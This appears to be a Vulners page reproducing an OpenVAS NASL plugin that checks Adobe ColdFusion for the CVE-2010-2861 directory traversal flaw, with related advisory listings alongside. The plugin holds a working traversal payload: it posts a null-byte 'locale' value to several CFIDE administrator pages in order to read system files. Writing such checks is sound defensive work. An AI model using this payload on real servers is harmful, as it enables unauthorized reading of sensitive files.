Adobe ColdFusion Directory Traversal Vulnerability (APSB10-18)
🗓️ 02 Sep 2010 00:00:00Reported by Copyright (C) 2010 Greenbone AGType
openvas🔗 plugins.openvas.org👁 50 Views
| Reporter | Title | Published | Views | Family All 35 |
|---|---|---|---|---|
| Adobe ColdFusion Directory Traversal Vulnerability | 14 Aug 201000:00 | – | zdt | |
| Adobe ColdFusion - Directory Traversal | 17 Mar 201100:00 | – | zdt | |
| CVE-2010-2861 | 11 Aug 201000:00 | – | attackerkb | |
| The vulnerability of the ColdFusion software platform arises from incorrect path name restrictions for restricted access directories, allowing attackers to read arbitrary files. | 8 Feb 202300:00 | – | bdu_fstec | |
| Immunity Canvas: CF_DIRECTORY_TRAVERSAL | 11 Aug 201018:47 | – | canvas | |
| CVE-2010-2861 | 14 Aug 201000:00 | – | circl | |
| Adobe ColdFusion Directory Traversal Vulnerability | 25 Mar 202200:00 | – | cisa_kev | |
| CISA and Partners Release Advisory on Ghost (Cring) Ransomware | 19 Feb 202512:00 | – | cisa | |
| Adobe ColdFusion 'locale' Parameter Directory Traversal | 16 Aug 201000:00 | – | nessus | |
| Adobe ColdFusion Directory Traversal (APSB10-18; CVE-2010-2861) | 5 Sep 201000:00 | – | checkpoint_advisories |
10
# SPDX-FileCopyrightText: 2010 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:adobe:coldfusion";
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.100772");
script_version("2025-04-15T05:54:49+0000");
script_tag(name:"last_modification", value:"2025-04-15 05:54:49 +0000 (Tue, 15 Apr 2025)");
script_tag(name:"creation_date", value:"2010-09-02 16:10:00 +0200 (Thu, 02 Sep 2010)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2024-07-16 17:49:02 +0000 (Tue, 16 Jul 2024)");
script_cve_id("CVE-2010-2861");
script_name("Adobe ColdFusion Directory Traversal Vulnerability (APSB10-18)");
script_category(ACT_ATTACK);
script_family("Web application abuses");
script_copyright("Copyright (C) 2010 Greenbone AG");
script_dependencies("gb_adobe_coldfusion_http_detect.nasl", "os_detection.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("adobe/coldfusion/http/detected");
script_xref(name:"URL", value:"https://web.archive.org/web/20211205102314/https://www.adobe.com/support/security/bulletins/apsb10-18.html");
script_xref(name:"URL", value:"https://helpx.adobe.com/coldfusion/kb/coldfusion-security-hot-fix-bulletin.html");
script_xref(name:"URL", value:"https://web.archive.org/web/20210127124815/http://www.securityfocus.com/bid/42342");
script_xref(name:"URL", value:"https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/");
script_xref(name:"URL", value:"https://www.cisa.gov/known-exploited-vulnerabilities-catalog");
script_xref(name:"CISA", value:"Known Exploited Vulnerability (KEV) catalog");
script_tag(name:"summary", value:"Adobe ColdFusion is prone to a directory traversal vulnerability
because it fails to sufficiently sanitize user-supplied input.");
script_tag(name:"vuldetect", value:"Sends multiple crafted HTTP POST requests and checks the
responses.");
script_tag(name:"impact", value:"Exploiting this issue may allow an attacker to obtain sensitive
information that could aid in further attacks.");
script_tag(name:"affected", value:"Adobe ColdFusion version 9.0.1 and prior is known to be
affected.");
script_tag(name:"solution", value:"Updates are available. Please see the references for more
information.");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
include("os_func.inc");
include("misc_func.inc");
include("traversal_func.inc");
if(!port = get_app_port(cpe:CPE, service:"www"))
exit(0);
if(!get_app_location(port:port, cpe:CPE, nofork:TRUE))
exit(0);
files = traversal_files();
urls[i++] = "/CFIDE/administrator/enter.cfm";
urls[i++] = "/CFIDE/wizards/common/_logintowizard.cfm";
urls[i++] = "/CFIDE/administrator/archives/index.cfm";
urls[i++] = "/CFIDE/administrator/entman/index.cfm";
host = http_host_name(port:port);
foreach url(urls) {
foreach pattern(keys(files)) {
file = files[pattern];
postdata = string("locale=%00../../../../../../../../../../../", file, "%00a");
req = string(
"POST ", url, " HTTP/1.1\r\n",
"Host: ", host, "\r\n",
"Content-Type: application/x-www-form-urlencoded\r\n",
"Content-Length: ", strlen(postdata), "\r\n",
"\r\n",
postdata);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
if(egrep(pattern:pattern, string:res, icase:TRUE)) {
report = http_report_vuln_url(port:port, url:url);
security_message(port:port, data:report);
exit(0);
}
}
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Apr 2025 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 27.5
CVSS 3.19.8
EPSS0.99721
SSVC